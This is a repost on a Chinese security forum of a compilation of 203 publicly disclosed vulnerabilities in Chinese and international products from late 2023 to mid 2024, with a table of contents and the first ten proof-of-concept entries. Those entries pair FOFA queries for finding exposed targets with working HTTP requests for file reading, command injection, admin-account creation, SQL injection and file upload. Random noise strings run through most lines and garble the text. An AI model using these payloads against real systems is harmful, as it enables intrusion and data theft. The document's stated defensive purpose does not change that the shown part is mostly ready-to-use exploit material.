找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 479|回复: 0

互联网公开漏洞整理202309-202406--转载

[复制链接]
发表于 2024-6-5 14:31:29 | 显示全部楼层 |阅读模式
互联网公开漏洞整理202309-202406
) z9 b) b3 F, z* g% r% ^3 |; B9 s道一安全 2024-06-05 07:41 北京, Y) x% ~+ h9 W
以下文章来源于网络安全新视界 ,作者网络安全新视界  m' ]. T% S9 z& o0 n1 y
# f- `5 D0 [& O
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。& e9 b+ y2 A7 f# J+ |

/ i4 n. G3 c: R, y* {+ f漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。$ X' A2 P, q6 `5 T3 o
5 ~& g4 \; J; S6 R2 u. i  ~2 y% @
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
+ Z; Q. f5 \( S2 {+ v
5 u* |1 w& T/ z0 S: Q$ ^: G; p文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
* Z; Z! L1 {# z! v" x% Y5 O# I0 z3 {
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
% s6 Q9 r5 H+ \3 I
9 [, T& ?# H& _! H
# c- O/ W# b  j1 ^6 Z声明
9 t' T: Y3 z5 }4 c
) b! j9 m) Y+ v3 J/ l. r为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。  s3 `- Z1 q/ u+ ^: v8 F

/ z1 M! H; ?2 R6 E0 C4 q有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
# p3 ~9 K. ?/ q( L3 c: j
- q0 C" ~) N$ H7 a. S/ l) B
2 i7 p) g0 \5 G& a: D4 r9 h0 }# O3 J
目录
  O$ ^0 Q8 Q5 Z! C
7 I8 D( A3 A& T& G* w4 \, M) a01
( k% \6 W3 H0 O- n0 ?3 U
5 \7 G  X: X+ _1. StarRocks MPP数据库未授权访问
- N' _, B  C1 [$ @$ G2. Casdoor系统static任意文件读取& b8 |1 i  Y( T+ g" L
3. EasyCVR智能边缘网关 userlist 信息泄漏7 m+ ?) S6 M& Q$ b, f6 V2 ^
4. EasyCVR视频管理平台存在任意用户添加
& l: I0 f& x1 i5. NUUO NVR 视频存储管理设备远程命令执行* |4 O6 f1 Q4 R: f3 P. D# T
6. 深信服 NGAF 任意文件读取
. J7 j1 [0 ^) M9 k7. 鸿运主动安全监控云平台任意文件下载
! M; x6 Q8 H  I  ]4 t% o8. 斐讯 Phicomm 路由器RCE2 G2 b2 [+ e( V1 x
9. 稻壳CMS keyword 未授权SQL注入/ {+ R% c) k& a& \: Y$ b
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传8 ?8 e* Q' j. ?9 |. J
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入1 j; k6 {8 t+ `3 P, [; a
12. Jorani < 1.0.2 远程命令执行
' F3 [, x" L/ K# X( W+ J13. 红帆iOffice ioFileDown任意文件读取
. k* w! W' p+ c# ~/ @6 M14. 华夏ERP(jshERP)敏感信息泄露- ]  W7 j' u: L5 e* a* o3 g' j
15. 华夏ERP getAllList信息泄露: V+ H. u) u8 o$ J8 y
16. 红帆HFOffice医微云SQL注入
8 R) l6 z* N+ c7 I4 s17. 大华 DSS itcBulletin SQL 注入' y( [% I+ G/ ^
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
  U" v  d. l0 N" e3 c2 N6 K8 f19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
3 F- Q. ~( @/ S* R6 R: q, k* ?8 ?- |20. 大华ICC智能物联综合管理平台任意文件读取
* R( }9 F1 A+ Y+ [, C0 c5 X21. 大华ICC智能物联综合管理平台random远程代码执行
' R& L0 N" c* S9 t( n22. 大华ICC智能物联综合管理平台 log4j远程代码执行) Q$ U+ ~3 ]8 q/ @% g# ]! i
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行; ~7 s" G: W0 e, B9 f
24. 用友NC 6.5 accept.jsp任意文件上传8 H" w% C- J' f
25. 用友NC registerServlet JNDI 远程代码执行. o" d* ?9 ?5 z  ^5 Q* f
26. 用友NC linkVoucher SQL注入: ]; s# P4 Z9 q" q
27. 用友 NC showcontent SQL注入& {' l9 M( u0 q; c8 k
28. 用友NC grouptemplet 任意文件上传! [2 r0 g( L# A! q& _
29. 用友NC down/bill SQL注入
) p0 P% J6 ^& [' U30. 用友NC importPml SQL注入
, K1 ?1 u! y( u  l, ?31. 用友NC runStateServlet SQL注入1 J0 @/ u( U* H0 \+ G, s$ f
32. 用友NC complainbilldetail SQL注入
) H8 t, |9 `) z9 e# m- C33. 用友NC downTax/download SQL注入
5 n7 N6 |6 W# X) b! n% q2 v; r6 ~34. 用友NC warningDetailInfo接口SQL注入
, N" D( g& x+ I, I* H4 K' G& @3 F+ X35. 用友NC-Cloud importhttpscer任意文件上传
0 y8 @6 Y" g5 G5 d3 Q. I36. 用友NC-Cloud soapFormat XXE) y- i5 A) H6 ]- Q  x( P" g
37. 用友NC-Cloud IUpdateService XXE& f( ?- @4 B! D6 B
38. 用友U8 Cloud smartweb2.RPC.d XXE' R: M. b6 N: N
39. 用友U8 Cloud RegisterServlet SQL注入, C% G- r2 G4 @/ C/ r% b
40. 用友U8-Cloud XChangeServlet XXE
+ `1 t7 s4 e9 r& a41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
6 d6 U+ N( E  z8 [/ n4 ~0 H42. 用友GRP-U8 SmartUpload01 文件上传
  a+ B# c8 c3 }2 H% Z' S43. 用友GRP-U8 userInfoWeb SQL注入致RCE
* d1 ]% m& \7 q( k1 x9 q2 W  K44. 用友GRP-U8 bx_dj_check.jsp SQL注入9 X- h$ c2 Z4 }9 a6 t1 r
45. 用友GRP-U8 ufgovbank XXE* C6 N9 W) h6 c
46. 用友GRP-U8 sqcxIndex.jsp SQL注入; R  N7 i( Y4 T
47. 用友GRP A++Cloud 政府财务云 任意文件读取: r) O% d3 t+ \6 s, d, l
48. 用友U8 CRM swfupload 任意文件上传4 c+ }; s( U6 a2 n0 Q  _
49. 用友U8 CRM系统uploadfile.php接口任意文件上传3 l1 @3 d, ]& ]+ S
50. QDocs Smart School 6.4.1 filterRecords SQL注入6 W2 g# C8 w+ F3 z% X4 U
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入* a8 ]2 d  f- I# c5 f$ t2 v6 Y
52. 泛微E-Office json_common.php sql注入, n+ t; r" g' Q
53. 迪普 DPTech VPN Service 任意文件上传- n$ t9 h4 y% z
54. 畅捷通T+ getstorewarehousebystore 远程代码执行6 B. D- \% l+ r1 L
55. 畅捷通T+ getdecallusers信息泄露9 `: B. u9 Q1 v) Q
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE5 t; {9 R/ B, e! c
57. 畅捷通T+ keyEdit.aspx SQL注入
9 i) p7 m& y7 t" O58. 畅捷通T+ KeyInfoList.aspx sql注入" i9 i: ]" ^" T4 P
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行) C/ A; p% B; L. x( t# K. {7 V
60. 百卓Smart管理平台 importexport.php SQL注入
4 ]3 x4 F0 D5 d; h) U0 b6 H4 `61. 浙大恩特客户资源管理系统 fileupload 任意文件上传* |# g* Y2 e$ u0 W% ^# |( |
62. IP-guard WebServer 远程命令执行2 `% l# X' }9 C( M
63. IP-guard WebServer任意文件读取* f' Q- y7 n- [) r* z8 P
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
* m+ `# [, ^- K2 B9 D$ R& n65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
2 q3 W% o( H6 d& H) R66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入2 x+ }& p" {- v2 ^8 W
67. 万户ezOFFICE wpsservlet任意文件上传& `; m7 p' C! p
68. 万户ezOFFICE wf_printnum.jsp SQL注入# O1 S9 j/ P" Z# A  A
69. 万户 ezOFFICE contract_gd.jsp SQL注入: z& ~8 E* p0 Y. Q, o" ^' U
70. 万户ezEIP success 命令执行% M! D/ q& ^! a* _. a
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
- P# |5 K/ W( [; h/ u; C! I7 I72. 致远OA getAjaxDataServlet XXE1 M1 C" C2 D( g8 Q' Q$ w
73. GeoServer wms远程代码执行
4 h, w% ^! x! y" o) k, M! G74. 致远M3-server 6_1sp1 反序列化RCE
$ t0 [) R4 r( A) a0 [! e9 P75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE, n: a8 L# j9 `0 `
76. 新开普掌上校园服务管理平台service.action远程命令执行
5 [) Z% I) b- j9 k7 |77. F22服装管理软件系统UploadHandler.ashx任意文件上传/ ]4 `/ N9 s" j( T3 ~! v; l
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传! `' o( a) X9 N' }7 k& G
79. BYTEVALUE 百为流控路由器远程命令执行* G0 ~1 t  n5 X' E  G
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传* l; H$ L# t$ R3 n5 I
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
* Z+ B; g& D$ \; |- E. s' N% {82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行# O' U* j% K4 w# r) J
83. JeecgBoot testConnection 远程命令执行
7 q/ M! a4 B6 V7 q: W84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
! i$ c& G# g& I3 W6 I' z85. SysAid On-premise< 23.3.36远程代码执行' a( A, U5 ^- ?$ k% n) \
86. 日本tosei自助洗衣机RCE6 b8 t9 \  `' B  Q9 {
87. 安恒明御安全网关aaa_local_web_preview文件上传: ]8 ~: F" Q; E  z  i
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
. s& I- v6 R$ V89. 致远互联FE协作办公平台editflow_manager存在sql注入: T+ G" r! M7 S8 a8 s
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行. N# m8 Y" j$ F* W9 P$ j
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
" Z( q+ k0 a9 v2 S92. 海康威视运行管理中心session命令执行8 F( K( s% V  m0 h+ ?6 K9 y, x
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
/ h& C/ p- z( [- H9 Y94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
" {0 R7 d3 O3 n, [95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行! a5 g, b7 k# r+ ~. z/ ^7 i( v  {6 n0 a
96. Apache OFBiz  18.12.11 groovy 远程代码执行' ], Y* j6 B* A- T1 L& [; d
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
: u* I" h: f3 W  n+ s% C3 X' y98. SpiderFlow爬虫平台远程命令执行5 ~1 S) o( I  z) [7 x) i( F) Y8 X# e
99. Ncast盈可视高清智能录播系统busiFacade RCE
3 z6 C" \3 `# b6 y( n100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传5 l& L# [8 b- b# {1 |* j8 B
101. ivanti policy secure-22.6命令注入' q: r# h7 q2 N% g" A0 L
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行$ J( a  J: R  ]
103. Ivanti Pulse Connect Secure VPN XXE
4 Q& ^- p8 A0 E; X  i& e3 c/ q104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露, A. j: Q; l& S/ r( j# z5 G! o
105. SpringBlade v3.2.0 export-user SQL 注入0 ^/ P  h3 l7 b  R
106. SpringBlade dict-biz/list SQL 注入
0 M7 ^% ?9 b+ L$ N! @107. SpringBlade tenant/list SQL 注入
0 A6 A; q5 p9 o' c5 K  a108. D-Tale 3.9.0 SSRF
  ?3 u& L$ Q' O1 o109. Jenkins CLI 任意文件读取
( f+ w4 q& L* y( u3 G- [110. Goanywhere MFT 未授权创建管理员
( O3 Q& G) o! Y, t. u111. WordPress Plugin HTML5 Video Player SQL注入
2 C3 f! a% C2 |+ v112. WordPress Plugin NotificationX SQL 注入; Q; A0 z$ i; P( ?
113. WordPress Automatic 插件任意文件下载和SSRF- n6 Q( G) U! f. {+ x1 J2 Z
114. WordPress MasterStudy LMS插件 SQL注入
# [) C. @5 Q1 e& T% ?2 U2 {- _) y' x115. WordPress Bricks Builder <= 1.9.6 RCE- |2 S( T6 L4 n4 k2 e# N& \4 P8 j
116. wordpress js-support-ticket文件上传
! M& [/ f$ _" B4 U/ a# K117. WordPress LayerSlider插件SQL注入0 t/ o3 u& A( Z- |+ U, r2 ^% Q
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
0 F) n- N4 q- D9 u9 U6 h- ^119. 北京百绰智能S20后台sysmanageajax.php sql注入8 o" v( O6 ], x: D9 h
120. 北京百绰智能S40管理平台导入web.php任意文件上传
7 \/ v  n* i& C& ~) q121. 北京百绰智能S42管理平台userattestation.php任意文件上传
+ ^3 D$ l6 l3 w. D/ M0 V' e* Q+ ^122. 北京百绰智能s200管理平台/importexport.php sql注入+ H% k! P0 z: }" X& }: B6 ]# Z
123. Atlassian Confluence 模板注入代码执行$ k& M& s5 X4 g4 N; f. r( s
124. 湖南建研工程质量检测系统任意文件上传# z% T6 H' o1 t! a
125. ConnectWise ScreenConnect身份验证绕过2 T5 f  [( P+ m9 o' G
126. Aiohttp 路径遍历
% V. G7 \. z; c" _0 E4 ~127. 广联达Linkworks DataExchange.ashx XXE
% w& U+ U! v; M" Z3 U6 k128. Adobe ColdFusion 反序列化
6 Y0 r" b% Y' l, ~0 `3 p5 }, E129. Adobe ColdFusion 任意文件读取
$ ^  r* a* }6 e130. Laykefu客服系统任意文件上传5 {$ X7 M: V1 h8 `( i* d
131. Mini-Tmall <=20231017 SQL注入+ J  V! \1 h( Z. f7 L
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过$ Z' U; g5 ^* l7 i7 d
133. H5 云商城 file.php 文件上传
/ d- n: ]; t+ R  N& F( m. q134. 网康NS-ASG应用安全网关index.php sql注入
; U& L# T- M6 U& }6 a135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
! w- }4 F0 m3 p136. NextChat cors SSRF/ m- N) c7 \7 S  K1 ], ~! y
137. 福建科立迅通信指挥调度平台down_file.php sql注入, a2 M  ^2 W: h
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
7 z8 F) f* ^1 |4 W: @$ M$ R2 E139. 福建科立讯通信指挥调度平台editemedia.php sql注入
! v! q, N% e! X2 g140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
- ~9 [" u6 t5 v141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入5 b9 p: K3 v" b0 P1 s
142. CMSV6车辆监控平台系统中存在弱密码% @+ J* v( L9 T# I2 T
143. Netis WF2780 v2.1.40144 远程命令执行# f5 N; }' Q4 T3 O6 j* z5 [, K7 y  l
144. D-Link nas_sharing.cgi 命令注入8 d# q5 W' C) f8 c, \+ |
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入7 M8 ]# R0 G( e5 s9 |  e9 J2 W5 |
146. MajorDoMo thumb.php 未授权远程代码执行6 g$ H- N/ S; v4 @- V* M0 t
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
1 [3 w7 `7 K  q148. CrushFTP 认证绕过模板注入
" B. y" R9 b7 L( g# u149. AJ-Report开源数据大屏存在远程命令执行! Z; y4 ^8 I! v+ R
150. AJ-Report 1.4.0 认证绕过与远程代码执行
, S- n/ B! _$ p; D/ s4 A151. AJ-Report 1.4.1 pageList sql注入
# e1 J( A" ~$ m3 v152. Progress Kemp LoadMaster 远程命令执行# e' _( F+ b+ T: e) q! f% _
153. gradio任意文件读取
, m6 Y* z1 H6 O* e( k7 {6 v0 f# d5 [2 _154. 天维尔消防救援作战调度平台 SQL注入5 T$ ]. K) n! u% q$ T# J
155. 六零导航页 file.php 任意文件上传
3 W9 [& C7 c; C" r2 `3 N156. TBK DVR-4104/DVR-4216 操作系统命令注入
9 D4 }; T; Q" E( v+ C157. 美特CRM upload.jsp 任意文件上传" N) {6 b; N. ?$ R4 y2 P1 B+ A
158. Mura-CMS-processAsyncObject存在SQL注入+ f- _9 c' _1 {, R. L, |
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传- n7 a+ W2 @3 l2 S. Z' k
160. Sonatype Nexus Repository 3目录遍历与文件读取6 M9 T9 w& C9 ~3 e1 U4 Z8 G
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
" y$ {2 A0 p# l# k  ]1 L2 Z1 s* K162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传+ q& ?: K2 I- m/ W- ?
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传+ Z' E2 j2 c: K# z# V% U. A7 c: ?
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传) n7 U- j9 q- Z; b! {& V
165. OrangeHRM 3.3.3 SQL 注入. N% C! z$ e: X2 e4 l
166. 中成科信票务管理平台SeatMapHandler SQL注入
6 G; V/ g& I" Q5 @2 v# d$ l' G167. 精益价值管理系统 DownLoad.aspx任意文件读取7 }+ N9 w$ b' ]
168. 宏景EHR OutputCode 任意文件读取
$ \4 p, u5 \) Y- ?( `. z8 a169. 宏景EHR downlawbase SQL注入
/ d: W. P. T7 D4 l9 c6 C9 l( w/ r170. 宏景EHR DisplayExcelCustomReport 任意文件读取
: ?. ?3 y+ h. q1 ], g$ V. P171. 通天星CMSV6车载定位监控平台 SQL注入
: {+ X8 J$ k# W& \* [172. DT-高清车牌识别摄像机任意文件读取! W) d$ V7 w2 k: `
173. Check Point 安全网关任意文件读取+ g! B, g0 _" r' b+ K$ P- M( d
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
5 v- Z3 D3 a( R6 j# r175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入- M& h( d9 B& z
176. 电信网关配置管理系统 rewrite.php 文件上传4 Z. A' W1 j- U4 ]
177. H3C路由器敏感信息泄露
# }$ e) S0 O4 O178. H3C校园网自助服务系统-flexfileupload-任意文件上传$ p. h3 a. ^3 g& S7 A; u+ z/ e
179. 建文工程管理系统存在任意文件读取% U* i0 O. W4 w: D0 f
180. 帮管客 CRM jiliyu SQL注入/ ], _9 }+ U' {( [( F2 L' f
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入9 _# K! r; J9 l& \8 t$ H. v
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建  ^$ i# `: K% K/ a* |
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
) `" v/ J  E( k" A8 K. l) G2 w5 I' D184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加- A- v) o7 [% K1 ^8 g
185. 瑞友天翼应用虚拟化系统SQL注入
, \# w6 g: N& s* v, |186. F-logic DataCube3 SQL注入% a+ a! \) u/ n
187. Mura CMS processAsyncObject SQL注入
( H$ S3 H# U# S! |( _188. 叁体-佳会视频会议 attachment 任意文件读取  y5 n) p, d, R3 m8 {5 g6 w' p
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
1 u! t, s7 q: X190. 短视频矩阵营销系统 poihuoqu 任意文件读取
8 M, `  Y+ H1 [0 Z6 \) n6 f191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入5 a; x/ e+ \  }0 S& K5 w
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传% Y+ {, u: \9 ^$ c. I/ d6 H
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
7 \* }/ ?( K& Z( t1 E  V' x+ \194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传7 d6 A! Q  G2 z8 r. K; O0 V2 F
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
5 [' e. S' @$ y5 ?8 S196. 河南省风速科技统一认证平台密码重置
+ {6 A$ ^2 E( ?$ _197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入' E6 E: i/ H1 a* n/ a4 _  I
198.  阿里云盘 WebDAV 命令注入7 d' A" j. b  N# {) ?
199. cockpit系统assetsmanager_upload接口 文件上传2 ]# V* [. M/ ^
200. SeaCMS海洋影视管理系统dmku SQL注入
# a) S+ Z3 F" N* F1 Y201. 方正全媒体新闻采编系统 binary SQL注入& a$ v, t; R1 j
202. 微擎系统 AccountEdit任意文件上传
# [: I+ S+ t/ _203. 红海云EHR PtFjk 文件上传
) m* r! J. U  \3 U* j1 A7 n$ k
POC列表
9 ^. {  o' J2 S8 Y. ]2 ?. ^, }
5 e4 K4 r/ v) K+ E4 [: h5 g# v02
1 j, V. M1 c7 Y- u1 {' ~$ B
' r2 l" Z, A& l4 M3 B1. StarRocks MPP数据库未授权访问
/ }& f; N1 w  t- d  e! NFOFA :title="StarRocks"
$ T/ B1 t' `' c% {: gGET /mem_tracker HTTP/1.17 K3 y% w" f, f% E& z# Y
Host: URL6 H: Q4 d+ K/ a# |; A9 Y

2 v$ A( u+ b1 H1 r% ~- m
8 {$ k9 K- k2 D3 d+ Q/ a* p2. Casdoor系统static任意文件读取9 _: r* P5 ]9 L7 a6 g
FOFA :title="Casdoor"
( U5 x) w' z& U  |- a" T( BGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
- P/ I+ w" R- j5 x4 ~Host: xx.xx.xx.xx:9999- @+ o% E1 _/ ~  W, k
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
( H4 D  H" r" w% o& s* C% aConnection: close! k) F/ Y3 D: {0 p
Accept: */*+ r; S7 [( k) Y. Q; x
Accept-Language: en
2 m" q' f9 n0 S; T# ]% d6 O( X* LAccept-Encoding: gzip, `8 W  P( s. x) q; B
1 B6 ]& ]3 U) c' j* A7 a6 @, N

' U" ~# H8 K- v- C4 l3. EasyCVR智能边缘网关 userlist 信息泄漏
, ^( I% N0 C' Q. [6 VFOFA :title="EasyCVR": e' r9 N% X  H& }* k6 l+ z
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
9 r" i* w$ E) T* d& V3 F5 WHost: xx.xx.xx.xx: @: x; ~% s( K. J9 s
( ]9 t, H% Y) V' \4 j

5 }; O( C, m+ O# L; w4. EasyCVR视频管理平台存在任意用户添加' t8 @' K$ ^) ~6 Q5 [0 }4 K
FOFA :title="EasyCVR"5 g1 r! p8 p7 B

$ B: d2 x) I: W0 R4 Xpassword更改为自己的密码md57 S  d. ?+ l1 l! T/ H2 T' o, o
POST /api/v1/adduser HTTP/1.1( }" }/ V. ]8 g; p, Y
Host: your-ip. k! R4 ]9 g/ ^7 C, x: w: @. Z# t# |6 _
Content-Type: application/x-www-form-urlencoded; charset=UTF-81 ^, W. p$ A, W% d! Z, y- E" |
+ c' a0 O& k" M# ?" @- l: c. w- N
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
; o4 A5 g+ M$ S# W/ [( ~0 s) e- J/ |( T3 N9 i: W
3 i8 c& [. S# x' N4 J: Z" P; E( ~
5. NUUO NVR 视频存储管理设备远程命令执行
. a/ Z7 e( z7 v- EFOFA:title="Network Video Recorder Login": q! t" g7 t: v4 ~
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
, I* j7 M. S" ]; ?Host: xx.xx.xx.xx5 G# l6 ]0 ^6 L& B( b( M
6 L* m/ v; L, {
0 _2 q+ l- o0 M2 @4 w
6. 深信服 NGAF 任意文件读取
$ Z# r5 N/ }' Y* {9 W+ hFOFA:title="SANGFOR | NGAF"
( J$ K- \; u! e: z! ]9 @- CGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
& G$ u* W- D) _Host:
6 {; m' m* ^3 P& T6 c+ O! n
3 c2 U9 L( k. V$ I& Q8 N1 k
( `. b, t& w& C* R+ t7. 鸿运主动安全监控云平台任意文件下载9 R3 ?: K) u5 H" d& E* `! H
FOFA:body="./open/webApi.html"% s. U. u$ H& M  k8 M2 `
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1& M6 Y: t) Z: O/ L2 d) O1 r1 u' o
Host:% d, r& h5 F- m/ g

$ D6 o" a; n( a1 R) V7 Q% B  J$ B) {! K5 B; t) {& R2 v4 V
8. 斐讯 Phicomm 路由器RCE+ K* a! O  t5 t* k* B9 |. d
FOFA:icon_hash="-1344736688"
/ Z  o% ]. p  t9 g默认账号admin登录后台后,执行操作
# S* A$ r( c: T/ j  t. TPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1) \* N1 w3 o+ b) N# F; a9 v
Host: x.x.x.x
/ _* \' `+ a- t$ ^5 ?1 xCookie: sysauth=第一步登录获取的cookie  r' ?- t! n  z# n
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz  {4 G% ~. Q! s$ u" |
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
. n: O) @0 s2 F* n! {* k; c
0 M! N. Q. t; w' F6 K, `2 W# v/ B------WebKitFormBoundaryxbgjoytz
; O: ]0 R( r$ i: w! ?+ FContent-Disposition: form-data; name="wifiRebootEnablestatus"* e" v3 T* a8 t5 x) L9 t. G

  v7 _) {/ u* }1 @. E. W%s6 p+ c+ W0 P/ ^& W- _
------WebKitFormBoundaryxbgjoytz
) `, G- n! E; r6 N" fContent-Disposition: form-data; name="wifiRebootrange": s  d( u2 U+ l* T0 i$ x. A/ w

# v. ]/ q) o- [: h1 |12:00; id;8 v1 s" ?" F2 t# E* o1 ^
------WebKitFormBoundaryxbgjoytz  o" [; m9 X3 m( N- W" j$ F* A
Content-Disposition: form-data; name="wifiRebootendrange"* T/ p5 O; M$ z% P. c8 J$ A; p
" M$ ^6 Y2 k  Z, ]! V9 u
%s:
7 r3 ]: {; p9 W: H# _1 H4 @+ N$ w------WebKitFormBoundaryxbgjoytz
) w) D0 ^; b0 \; wContent-Disposition: form-data; name="cururl2"
" D* B! X* A; J0 F5 t5 m# s) L7 L
! O9 Y7 L5 \1 ?' E& z
$ K: B0 E9 K9 `5 h3 I) M6 Y------WebKitFormBoundaryxbgjoytz--
3 a! v2 z, `" T0 m" O- y: v
; D& c# B2 f% e  M8 n2 y3 }  k* Z& `5 H) [" b
9. 稻壳CMS keyword 未授权SQL注入$ A4 o- p! D2 b. E! D' D: [
FOFA:app="Doccms"
2 m6 B# \9 ~1 E' E+ F; _GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.17 e- D+ f# z9 ]  e! l# U
Host: x.x.x.x% B2 P: B% S3 f  t, K; e6 ]$ i+ H
' i' s/ z( M+ {

7 x3 v( O- A# X+ ]2 ?- L6 t* \payload为下列语句的二次Url编码2 N! b# e. R2 \

! O" ^- Y) n) K0 Q& B2 [' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
. ^/ O8 K+ D. d( V, M* r" ?6 ^1 h! b6 W+ b5 F: R& x( [1 p
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
$ [5 ?5 k: [/ n8 Z7 t; G; pFOFA:icon_hash="953405444"3 o& {; V  ~/ ~  u
  K% Q* D  `; p5 a; o# G3 e- b
文件上传后响应中包含上传文件的路径
, I0 {+ M8 l! {POST /eis/service/api.aspx?action=saveImg HTTP/1.1
3 T  H% a/ a  e$ a& o( K; CHost: x.x.x.x:xx
: V8 j! K7 P. k3 i- ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
9 h6 [8 u) q4 q4 n4 C* fContent-Length: 1970 d( T8 J/ |1 L: {9 o# M$ r( p, C! H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9+ W4 C% b7 Y3 q' U5 D6 `0 V5 q5 X, ]
Accept-Encoding: gzip, deflate9 {. ]( H) ?. N
Accept-Language: zh-CN,zh;q=0.9+ t& Q; W# `% F4 V" l: g, Z; j
Connection: close
  j- F& A/ t( @Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu2 x, ]8 L8 R% Q# x; l

) U4 F, ^+ C# ]2 X. t% x* p------WebKitFormBoundaryxdgaqmqu
2 R: Y9 Y9 _2 k9 P2 CContent-Disposition: form-data; name="file"filename="icfitnya.txt"
% j1 b7 R( N* x- U; e, i8 a$ WContent-Type: text/html
, f  |, t  [* w3 d6 ]' v& t% f9 E( F6 e' z
jmnqjfdsupxgfidopeixbgsxbf
, `; k. Q0 Y# I/ D% S7 k- F------WebKitFormBoundaryxdgaqmqu--1 {2 W0 b* j  D/ z+ ~$ Y

